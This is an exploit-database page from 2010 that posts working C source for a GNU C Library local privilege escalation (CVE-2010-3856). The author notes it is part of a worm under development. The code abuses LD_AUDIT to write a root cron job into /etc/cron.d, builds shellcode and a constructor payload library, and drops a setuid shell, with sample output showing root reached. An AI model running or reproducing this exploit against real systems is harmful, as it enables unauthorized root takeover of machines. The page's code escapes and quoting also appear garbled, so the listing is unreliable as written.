[local exploits] - GNU C Library local root (uid=0,gid=0) Ex
Posted on 04 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>GNU C Library local root (uid=0,gid=0) Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='GNU C Library local root (uid=0,gid=0) Exploit by devilzc0de in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================== GNU C Library local root (uid=0,gid=0) Exploit ============================================== GNU C Library local root (uid=0,gid=0) exploit bug found by tavis ormandy exploit code by devilzc0de software url: http://www.gnu.org/software/libc/ Category: local tested on sh-3.2# cat /etc/issue Debian GNU/Linux 5.0 l [code] /** #Exploit Title: GNU C Library local root (uid=0,gid=0) exploit #date: 04-12-10 #author: devilzc0de #bugs found by: Tavis Ormandy (taviso@sdf.lonestar.org) # Tested on: Debian GNU/Linux 5.0 #CVE: 2010-3856 #vulnerable : GNU C library a basic exploit made by: devilzc0de (www.devilzc0de.org) special thanks to all devilzc0de crews and members, glodhaxors crews and members tis is part of my worm (currently making dual os worm for 7 months) mywisdom@DL:~/sploit$ id uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom) mywisdom@DL:~/sploit$ ./glibc GLIBC local privilege escalation exploit Bugs found by Tavis Ormandy made by: devilzc0de.org ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored. Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline] [-p pattern] [-s packetsize] [-t ttl] [-I interface or address] [-M mtu discovery hint] [-S sndbuf] [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination [+]waiting for dropped suid shell from our cron daemon, please wait ... sh-3.2# id uid=0(root) gid=0(root) groups=1001(mywisdom) sh-3.2# **/ #include <string.h> #include <sys/types.h> #include <stdio.h> #include <sys/stat.h> #include <stdlib.h> #include <unistd.h> void salam() { printf(" GLIBC local privilege escalation exploit "); printf(" Bugs found by Tavis Ormandy "); printf(" made by: devilzc0de.org "); } void eksplo1() { int i; struct stat bufer; umask(0); bikin_payload1(); popen("dpkg -S /lib/libpcprofile.so","r"); if(stat("/lib/libpcprofile.so",&bufer)!=0) { eksplo2(); } else { popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r"); } if(stat("/etc/cron.d/w00t",&bufer)!=0) { eksplo2(); } else { if(stat("/tmp/suidshell",&bufer)!=0) { exit(1); } else { popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot ' > /etc/cron.d/w00t", "r"); } printf("[+]waiting for dropped suid shell from our cron daemon, please wait ... "); usleep(60000000); system("/tmp/./gotroot -c /tmp/./suidshell"); } } int bikin_payload1() { FILE *fp2; const char *str2 ="char shellcode[] ="x6ax17x58x31xdbxcdx80x6ax2ex58x53xcdx80x31xd2x6ax0bx58x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcdx80";int main(){int (*f)() = (int(*)())shellcode;f();}"; fp2 = fopen("suid.c", "w"); fwrite(str2, 1, strlen(str2), fp2); fclose(fp2); popen("gcc -o /tmp/suidshell suid.c","r"); } int bikin_payload2() { FILE *fp; const char *str ="void __attribute__((constructor)) init(){ setuid(0);system("/bin/bash");}"; fp = fopen("payload.c", "w"); fwrite(str, 1, strlen(str), fp); fclose(fp); popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r"); } void il_fil_de() { struct stat buf; if(stat("payload.c",&buf)==0) { remove("payload.c"); } if(stat("suid.c",&buf)==0) { remove("suid.c"); } if(stat("/tmp/exploit",&buf)==0) { remove("/tmp/exploit"); } } int eksplo2() { remove("/tmp/exploit"); popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r"); popen("exec 3< /tmp/exploit/target","r"); remove("/tmp/exploit"); bikin_payload2(); popen("LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3","r"); } int main(int argc,char **argv[]) { struct stat buf; salam(); il_fil_de(); mkdir("/tmp/exploit",0777); if(stat("/etc/cron.d",&buf)!=0) { eksplo2(); } else { eksplo1(); } } [/code] # <a href='http://1337db.com/'>1337db.com</a> [2010-12-04]</pre></body></html>
